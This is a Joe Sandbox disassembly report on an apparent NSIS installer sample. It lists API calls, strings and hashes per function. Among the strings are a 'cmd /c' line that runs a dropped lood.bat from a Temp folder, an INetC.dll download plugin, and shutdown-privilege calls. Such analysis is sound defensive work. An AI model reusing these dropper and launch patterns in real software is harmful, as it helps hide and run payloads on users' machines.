SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
DeleteFileW.KERNEL32(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

wsprintfW.USER32 ref: 004039B1
GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
DeleteFileW.KERNEL32(00437800), ref: 004039F0
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E

Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321

CopyFileW.KERNEL32(C:\Users\user\Desktop\file.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34

Part of subcall function 00405B3A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Part of subcall function 004068B4: FindFirstFileW.KERNEL32(75923420,0042FAB8,C:\,00405F77,C:\,C:\,00000000,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB

ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A7D
OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
ExitProcess.KERNEL32 ref: 00403A9F
CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
ExitProcess.KERNEL32 ref: 00403B49

Part of subcall function 00405B05: CreateDirectoryW.KERNEL32(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B

Strings

~nsu%X.tmp, xrefs: 004039A8
Low, xrefs: 00403848
Error launching installer, xrefs: 004038FD
SeShutdownPrivilege, xrefs: 00403AD8
TMP, xrefs: 00403862
NSIS Error, xrefs: 00403695
C:\Users\user\Desktop\file.exe, xrefs: 00403A2F
\Temp, xrefs: 0040382C
1033, xrefs: 00403876
TEMP, xrefs: 0040385A
UXTHEME, xrefs: 00403620, 00403625, 0040362B
C:\Users\user\AppData\Local\Temp\, xrefs: 0040380A, 0040380F, 00403825, 00403831, 00403840, 0040384D, 00403859, 00403861, 0040394F, 004039D0, 004039FC, 00403A1D, 00403A26

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: 1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\file.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 2017177436-720031388
Opcode ID: e969c2e22f73361fc79175c4bfa344e76f400cd5c8ceb61292dbf8b91988ccbf
Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
Opcode Fuzzy Hash: e969c2e22f73361fc79175c4bfa344e76f400cd5c8ceb61292dbf8b91988ccbf
Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405C63 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405C8C
lstrcatW.KERNEL32(0042EA70,\*.*), ref: 00405CD4
lstrcatW.KERNEL32(?,0040A014), ref: 00405CF7
lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,75923420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CFD
FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,75923420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405D0D
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
FindClose.KERNEL32(00000000), ref: 00405DBC

Strings

pB, xrefs: 00405CBC
\*.*, xrefs: 00405CCE
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C70

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$\*.*$pB
API String ID: 2035342205-1746305512
Opcode ID: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
Opcode Fuzzy Hash: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNEL32(75923420,0042FAB8,C:\,00405F77,C:\,C:\,00000000,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
FindClose.KERNEL32(00000000), ref: 004068CB

Strings

C:\, xrefs: 004068B4

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9

Uniqueness

Uniqueness Score: -1.00%

Function 00403C29 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978

GetUserDefaultUILanguage.KERNEL32(00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0043F000,00008001), ref: 00403C43

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

lstrcatW.KERNEL32(1033,0042CA68), ref: 00403CAA
lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,75923420), ref: 00403D2A
lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
GetFileAttributesW.KERNEL32(004326A0), ref: 00403D48
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91
RegisterClassW.USER32(004336A0), ref: 00403DCE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
ShowWindow.USER32(00000005,00000000), ref: 00403E51
GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
RegisterClassW.USER32(004336A0), ref: 00403E93
DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2

Strings

RichEd32, xrefs: 00403E65
RichEd20, xrefs: 00403E57
_Nb, xrefs: 00403DAD, 00403E15
.exe, xrefs: 00403D37
.DEFAULT\Control Panel\International, xrefs: 00403C95
1033, xrefs: 00403C49, 00403CA5
RichEdit20W, xrefs: 00403E75, 00403E7B
RichEdit, xrefs: 00403E84
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5D
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2E

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-1629884446
Opcode ID: 668670e2436d8560ce7a95db19fe7fb6d2e11ba6b6241f5eb901d3d615c3ba1a
Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
Opcode Fuzzy Hash: 668670e2436d8560ce7a95db19fe7fb6d2e11ba6b6241f5eb901d3d615c3ba1a
Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403082 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403093
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000400), ref: 004030AF

Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,C:\Users\user\Desktop\file.exe,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 004030FB
GlobalAlloc.KERNEL32(00000040,?), ref: 00403231

Strings

Inst, xrefs: 00403167
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
Error launching installer, xrefs: 004030D2
C:\Users\user\Desktop\file.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
soft, xrefs: 00403170
Null, xrefs: 00403179
C:\Users\user\AppData\Local\Temp\, xrefs: 00403089

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\file.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-2174208811
Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

Uniqueness

Uniqueness Score: -1.00%

Function 004032B9 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403323
GetTickCount.KERNEL32 ref: 004033CA
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033F3
wsprintfW.USER32 ref: 00403406

Strings

A, xrefs: 00403483
... %d%%, xrefs: 00403400
A, xrefs: 00403379
*B, xrefs: 004032E4

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ A$ A$... %d%%
API String ID: 551687249-3485722521
Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401774 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,"cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat","cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat",00000000,00000000,"cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat",00440000,?,?,00000031), ref: 004017DA

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00428E20,759223A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,759223A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Strings

"cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat", xrefs: 00401792, 0040179B, 004017A8, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B
C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\INetC.dll, xrefs: 0040183A, 00401856

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat"$C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\INetC.dll
API String ID: 1941528284-85807391
Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

Uniqueness

Uniqueness Score: -1.00%

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
wsprintfW.USER32 ref: 0040692D
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Strings

UXTHEME, xrefs: 004068E4
%s%S.dll, xrefs: 00406927

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405F2E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75923420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75923420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405F87
GetFileAttributesW.KERNEL32(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97

Strings

C:\, xrefs: 00405F34, 00405F39, 00405F3F, 00405F80, 00405F86, 00405F8E, 00405F96
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F2E

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
